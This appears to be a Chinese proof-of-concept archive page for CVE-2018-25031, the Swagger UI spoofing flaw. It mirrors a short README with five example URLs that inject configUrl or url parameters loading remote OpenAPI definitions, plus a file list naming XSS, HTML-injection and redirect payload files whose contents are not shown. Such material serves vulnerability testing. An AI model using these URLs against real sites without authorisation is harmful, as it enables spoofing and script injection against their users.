关联漏洞
标题:
Swagger UI 输入验证错误漏洞
(CVE-2018-25031)
描述:Swagger UI是一款支持可视化API资源并能够与之进行交互的开源工具。 Swagger-api Swagger UI 4.1.3之前版本中存在安全漏洞,该漏洞源于软件缺少对于用户提交的URL数据过滤和转义。攻击者可以通过特制的URL数据利用该漏洞进行欺骗攻击并显示远程OpenAPI定义。
描述
CVE-2018-25031 tests
介绍
# CVE-2018-25031
CVE-2018-25031 exploits tests
Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.
## HowTo
Find the documentation endpoint and add the parameter "configUrl" pointing to test.json or "url" pointing to test.yaml.
```
https://exemple.com/?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
https://exemple.com/?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui/index.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/api/swagger/index.html?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
```
## Screenshots


文件快照
[4.0K] /data/pocs/d05db86ca515ae04f04215b4edf751a741cf23a8
├── [2.7K] f.yaml
├── [ 258] htmli.json
├── [1.4K] htmli.yaml
├── [1.2K] README.md
├── [1.5K] redirect.yaml
├── [ 256] test.json
├── [1.3K] test.yaml
├── [1.4K] xss2.yaml
├── [ 254] xss.json
└── [1.4K] xss.yaml
0 directories, 10 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。